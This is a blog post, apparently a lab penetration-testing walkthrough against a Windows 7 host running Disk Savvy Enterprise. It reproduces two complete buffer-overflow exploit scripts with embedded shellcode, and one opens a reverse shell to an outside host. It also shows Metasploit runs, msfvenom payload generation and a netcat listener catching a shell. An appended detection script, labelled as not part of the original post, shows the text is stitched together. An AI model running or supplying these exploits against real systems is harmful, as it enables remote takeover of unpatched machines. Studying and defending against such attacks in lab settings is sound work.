Basic Penetration Testing Techniques, Chapter 3 (002)


Posted by nathan2009729 on 2023-03-26

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p- 172.16.1.87
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 22:52 EST
Nmap scan report for 172.16.1.87
Host is up (0.041s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
9124/tcp  open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 28.89 seconds

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p80,135,139,445,9124,49152-49157 172.16.1.87 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 22:54 EST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.82% done; ETC: 22:56 (0:00:20 remaining)
Stats: 0:02:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 22:57 (0:00:00 remaining)
Nmap scan report for 172.16.1.87
Host is up (0.022s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|   GenericLines, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 400 Bad Request
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Content-Length: 1519
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
|     <html>
|     <head>
|     <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
|     <meta name='Author' content='Flexense HTTP Server v9.9.14'>
|     <meta name='GENERATOR' content='Flexense HTTP v9.9.14'>
|     <title>Disk Savvy Enterprise @ SEH-PC - Online Registration</title>
|     <link rel='stylesheet' type='text/css' href='resources/disksavvy.css' media='all'>
|     </head>
|     <body>
|     <div id='header'><table border=0 padding=0 cellpadding=0 cellspacing=0 width='100%'><tr>
|     <td width=220 align=left>Disk Savvy Enterprise v9.9.14</td>
|     <td></td>
|     <td width=220 align=right id='stime'>12-Mar-2023 11:54:41</td>
|     </tr></table></div>
|     <div id='content'>
|     <form method='POST' action='online_registration'>
|_    <table border=0 padding=0 cellpadding=0
|_http-generator: Flexense HTTP v9.9.14
|_http-title: Disk Savvy Enterprise @ SEH-PC - Online Registration
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9124/tcp  open  unknown
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (94%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (94%), Microsoft Windows Vista SP2 (94%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (93%), Microsoft Windows Server 2008 R2 or Windows 8 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 R1 (93%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (93%), Microsoft Windows 7 or Windows Server 2008 R2 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SEH-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   210:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SEH-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00155d01361c (Microsoft)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-03-12T03:57:18
|_  start_date: 2023-03-11T22:01:37
|_clock-skew: mean: -2h40m02s, deviation: 4h37m06s, median: -3s
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: SEH-PC
|   NetBIOS computer name: SEH-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-03-12T11:57:19+08:00

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   63.68 ms 192.168.200.1
2   11.68 ms 172.16.1.87

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.01 seconds

The http-title reveals an unfamiliar product name, so let's look for known vulnerabilities:

The first one:

The code at the bottom of that page:

# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
# Date: 01/02/2018
# Exploit Author: Daniel Teixeira
# Vendor Homepage: http://www.disksavvy.com/
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe
# Version: 10.4.18
# CVE: CVE-2018-6481
# Tested on: Windows 7 x86


from struct import pack
from os import system
from sys import exit
from time import sleep
import socket

port = 9124
host = "172.16.40.148"

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode 
shellcode =  ""
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"

payload =  "A" * 124            # offset
payload += "\x90\x09\xeb\x05"   # jmp over seh return value
payload += "\x13\x6d\x05\x10"   # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)
payload += "\x90" * 10
payload += "\x83\xc4\x64" * 20  # metasm > add esp,100
payload += "\xff\xe4"           # metasm > jmp esp
payload += "\x90" * (1000 - len(payload) - len(shellcode))
payload += shellcode

header =  "\x75\x19\xba\xab"
header += "\x03\x00\x00\x00"
header += "\x00\x40\x00\x00"
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

    print "[*] Testing connection to target %s:%s" %(host,port)
    s.connect((host, port))

except:

    print "[-] Unable to communicate to target %s:%s" %(host,port)

    exit()

s.send(packet)

print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:4444 .." %host
sleep(5)
system("nc %s 4444"%host)

The rough idea is: let the DLL finish executing first, then use the DLL to load this shellcode. It doesn't feel very easy to use, so let's look at Metasploit:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# msfconsole



       =[ metasploit v6.3.2-dev                           ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search savvy

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/windows/misc/disk_savvy_adm     2017-01-31       great      No     Disk Savvy Enterprise v10.4.18
   1  exploit/windows/http/disksavvy_get_bof  2016-12-01       excellent  Yes    DiskSavvy Enterprise GET Buffer Overflow


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/disksavvy_get_bof

msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/disksavvy_get_bof) > use 1
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/disksavvy_get_bof) > show options

Module options (exploit/windows/http/disksavvy_get_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port]
                                       [...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/doc
                                       s/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.18.193   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/disksavvy_get_bof) > set rhosts 172.16.1.87
rhosts => 172.16.1.87
msf6 exploit(windows/http/disksavvy_get_bof) > set lhost 192.168.200.6
lhost => 192.168.200.6
msf6 exploit(windows/http/disksavvy_get_bof) > set lport 7071
lport => 7071
msf6 exploit(windows/http/disksavvy_get_bof) > show options

Module options (exploit/windows/http/disksavvy_get_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port]
                                       [...]
   RHOSTS   172.16.1.87      yes       The target host(s), see https://docs.metasploit.com/doc
                                       s/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.200.6    yes       The listen address (an interface may be specified)
   LPORT     7071             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/disksavvy_get_bof) > run

[*] Started reverse TCP handler on 192.168.200.6:7071
[*] Automatically detecting the target...
[-] Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.

That failed; try the other one:

msf6 exploit(windows/http/disksavvy_get_bof) > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/disk_savvy_adm) > show options

Module options (exploit/windows/misc/disk_savvy_adm):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs
                                      /using-metasploit/basics/using-metasploit.html
   RPORT   9124             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.18.193   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Savvy Enterprise v10.4.18



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/disk_savvy_adm) > set rhosts 172.16.1.87
rhosts => 172.16.1.87
msf6 exploit(windows/misc/disk_savvy_adm) > set lhost 192.168.200.6
lhost => 192.168.200.6
msf6 exploit(windows/misc/disk_savvy_adm) > set lport 7073
lport => 7073
msf6 exploit(windows/misc/disk_savvy_adm) > show options

Module options (exploit/windows/misc/disk_savvy_adm):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.1.87      yes       The target host(s), see https://docs.metasploit.com/docs
                                      /using-metasploit/basics/using-metasploit.html
   RPORT   9124             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.200.6    yes       The listen address (an interface may be specified)
   LPORT     7073             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Savvy Enterprise v10.4.18



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/disk_savvy_adm) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Disk Savvy Enterprise v10.4.18


msf6 exploit(windows/misc/disk_savvy_adm) > run

[*] Started reverse TCP handler on 192.168.200.6:7073
[*] Exploit completed, but no session was created.

That failed too. Search again more carefully, this time with the version number:

Found a new PoC.

But like the one found online a moment ago, it is also a buffer overflow vulnerability:

#!/usr/bin/env python
# Exploit Title: Disk Savvy Enterprise 9.9.14 Remote SEH Buffer Overflow
# Date: 2017-08-25
# Exploit Author: Nipun Jaswal & Anurag Srivastava
# Author Homepage: www.pyramidcyber.com
# Vendor Homepage: http://www.disksavvy.com
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v9.9.14.exe
# Version: v9.9.14
# Tested on: Windows 7 SP1 x64
# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
import socket,sys
target = "127.0.0.1"
port = 8080

#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf =  ""
buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"


payload = buf # Shellcode begins from the start of the buffer
payload += 'A' * (2492 - len(payload)) # Padding after shellcode till the offset value
payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 16 bytes (0x10)
payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
payload += '\x90' * 10 # NOPsled
payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
payload += 'D' * (5000-len(payload)) # Additional Padding

s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,port))
    print "[*] Connection Success."
except:
    print "Connection Refused %s:%s" %(target,port)
    sys.exit(2)

packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
packet += "Host: 4.2.2.2\r\n"
packet += "Connection: keep-alive\r\n"
packet += "Referer: http://pyramidcyber.com\r\n"
packet += "\r\n"
s.send(packet)
s.close()

As shown below, besides changing target and port to match the nmap results, buf also has to be regenerated with msfvenom.

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.200.6 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 710 (iteration=0)
x86/alpha_mixed chosen with final size 710
Payload size: 710 bytes
Final size of python file: 3511 bytes

Overwrite the buf += lines in the original Python file with the output generated above:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim 42558-1.py

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 42558-1.py
  File "/home/kali/PT_day3/42558-1.py", line 90
    print "[*] Connection Success."
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python2 42558-1.py
[*] Connection Success.

Don't forget to start listening on the port first:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4443
listening on [any] 4443 ...
connect to [192.168.200.6] from (UNKNOWN) [172.16.1.87] 49159
Microsoft Windows [版本 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
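As an added, defender-side example that is not part of the original post or of either exploit quoted above: the script below parses the two request shapes those exploits rely on, the 24-byte framing sent to port 9124 (magic bytes, two fixed dwords, the body length twice, then the final body byte) and the GET request line sent to the Flexense web server on port 80, and raises an alert when a declared or observed length exceeds a sane bound or the header fields disagree. The thresholds and every sample input are constructed assumptions for this example, not values from the page.

```python
import struct

# Header layout as used by the port-9124 exploit quoted on the page:
# 4-byte magic, two fixed dwords, body length (twice), then the last body byte.
DISK_SAVVY_MAGIC = b"\x75\x19\xba\xab"
HEADER_FMT = "<4sIIIII"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 24 bytes

# Thresholds are assumptions for this example: the page's exploits send a
# 1000-byte body on 9124 and a request target of roughly 5000 bytes on port 80.
MAX_SANE_BODY = 256
MAX_SANE_TARGET = 1024


def inspect_admin_packet(data: bytes) -> dict:
    """Parse the 9124 framing and report length inconsistencies or oversized bodies."""
    if len(data) < HEADER_LEN:
        return {"proto": "disksavvy", "verdict": "alert", "reason": "truncated header"}
    magic, _cmd, _flags, len1, len2, last = struct.unpack(HEADER_FMT, data[:HEADER_LEN])
    if magic != DISK_SAVVY_MAGIC:
        return {"proto": "disksavvy", "verdict": "ignore", "reason": "magic mismatch"}
    body = data[HEADER_LEN:]
    reasons = []
    if len1 != len2:
        reasons.append("length fields disagree")
    if len1 > MAX_SANE_BODY:
        reasons.append(f"declared body length {len1} exceeds {MAX_SANE_BODY}")
    if len(body) != len1:
        reasons.append(f"declared {len1} body bytes but {len(body)} were sent")
    if body and last != body[-1]:
        reasons.append("trailer byte does not match last body byte")
    return {
        "proto": "disksavvy",
        "verdict": "alert" if reasons else "ok",
        "reason": "; ".join(reasons) or "header consistent",
    }


def inspect_http_request(raw: bytes) -> dict:
    """Flag an oversized or traversal-bearing request target in the request line."""
    line = raw.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return {"proto": "http", "verdict": "alert", "reason": "malformed request line"}
    target = parts[1]
    reasons = []
    if len(target) > MAX_SANE_TARGET:
        reasons.append(f"request target is {len(target)} bytes")
    if b"/../" in target:
        reasons.append("parent-directory traversal in request target")
    return {
        "proto": "http",
        "verdict": "alert" if reasons else "ok",
        "reason": "; ".join(reasons) or "request line within limits",
    }


def frame_admin_body(body: bytes) -> bytes:
    """Constructed helper: frame a body the way the page's 9124 header does, for testing."""
    if not body:
        raise ValueError("body must be non-empty")
    header = struct.pack(HEADER_FMT, DISK_SAVVY_MAGIC, 3, 0x4000, len(body), len(body), body[-1])
    return header + body


# Constructed samples (not captures): one benign-looking message per protocol
# and one shaped like the oversized requests the page's exploits send.
SAMPLE_ADMIN_OK = frame_admin_body(b"\x01\x00\x00\x00" * 4)
SAMPLE_ADMIN_BAD = frame_admin_body(b"A" * 1000)
SAMPLE_HTTP_OK = b"GET /resources/disksavvy.css HTTP/1.1\r\nHost: seh-pc\r\n\r\n"
SAMPLE_HTTP_BAD = b"GET /../" + b"A" * 5000 + b" HTTP/1.1\r\nHost: seh-pc\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_ADMIN_OK, SAMPLE_ADMIN_BAD):
        print(inspect_admin_packet(sample))
    for sample in (SAMPLE_HTTP_OK, SAMPLE_HTTP_BAD):
        print(inspect_http_request(sample))
```

The same checks could be applied to a packet capture or a reverse proxy's request log in front of the management port; the smb-security-mode finding above (message signing disabled) is a separate hardening item that this script does not cover.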
